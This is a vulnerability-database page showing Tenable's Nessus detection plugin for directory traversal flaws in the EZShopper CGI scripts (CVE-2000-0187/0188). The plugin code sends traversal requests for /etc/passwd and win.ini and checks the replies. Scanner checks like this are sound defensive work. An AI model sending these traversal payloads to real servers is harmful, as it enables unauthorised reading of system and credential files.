Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2000-2021 Tenable Network Security, Inc.EZSHOPPER.NASL
HistoryFeb 28, 2000 - 12:00 a.m.

EZShopper Multiple Directory Traversal Vulnerabilities

2000-02-2800:00:00
This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.
www.tenable.com
71

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.014

Percentile

86.7%

JSON

The version of EZShopper running on the remote host has multiple directory traversal vulnerabilities in loadpage.cgi and search.cgi.
A remote attacker could exploit this to read sensitive information from the server.

There is also an arbitrary command execution vulnerability in this version of EZShopper, though Nessus has not checked for that issue.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if(description)
{
 script_id(10065);
 script_version("1.41");
 script_cve_id("CVE-2000-0187", "CVE-2000-0188");
 script_bugtraq_id(1014);
 
 script_name(english:"EZShopper Multiple Directory Traversal Vulnerabilities");
 script_summary(english:"Tries a directory traversal attack");

 script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host has multiple directory traversal
vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The version of EZShopper running on the remote host has multiple
directory traversal vulnerabilities in loadpage.cgi and search.cgi.
A remote attacker could exploit this to read sensitive information
from the server.

There is also an arbitrary command execution vulnerability in this
version of EZShopper, though Nessus has not checked for that issue." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/2000/Feb/437"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/02/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/02/27");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.");

 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 if(is_cgi_installed3(item:dir+"/loadpage.cgi", port:port))
 {
req = string(dir, "/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd");
rep = http_send_recv3(method:"GET", item:req, port:port);
if(isnull(rep)) exit(0);

if("root:" >< rep[2]){
      security_warning(port);
      exit(0);
      }


req2 = string(dir,"/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini");
rep2 = http_send_recv3(method:"GET", item:req2, port:port);
if(isnull(rep2)) exit(0);


if("[windows]" >< rep2[2]){
      security_warning(port);
      exit(0);
      }
 }

if(is_cgi_installed3(item:dir+"/search.cgi", port:port))
 {
req3 = string(dir,"/search.cgi?user_id=1&database=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&template=..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&distinct=1");
rep3 = http_send_recv3(method:"GET", item:req3, port:port);
if(isnull(rep3)) exit(0);

if("[windows]" >< rep3[2]){
      security_warning(port);
      exit(0);
      }


req4 = string(dir, "/loadpage.cgi?user_id=1&database=../../../../../../etc/passwd&template=../../../../../../../../../etc/passwd&distinct=1");
rep4 = http_send_recv3(method:"GET", item:req4, port:port);
if(isnull(rep4)) exit(0);

if("root:" >< rep4[2]){
      security_warning(port);
      exit(0);
      }
  }   
}

Related

exploitdb 2
cve 2
nvd 2
cvelist 2
exploitdb
exploitdb
Alex Heiphetz Group eZshopper - &#039;loadpage.cgi&#039; Directory Traversal
2004-11-25 00:00:00
Alex Heiphetz Group eZshopper 3.0 - Remote Command Execution
2000-02-27 00:00:00
cve
cve
CVE-2000-0187
2000-03-22 05:00:00
CVE-2000-0188
2000-03-22 05:00:00
nvd
nvd
CVE-2000-0187
2000-02-27 05:00:00
CVE-2000-0188
2000-02-27 05:00:00
cvelist
cvelist
CVE-2000-0187
2000-03-22 05:00:00
CVE-2000-0188
2000-03-22 05:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.014

Percentile

86.7%

JSON
Related for EZSHOPPER.NASL
exploitdb2cve2nvd2cvelist2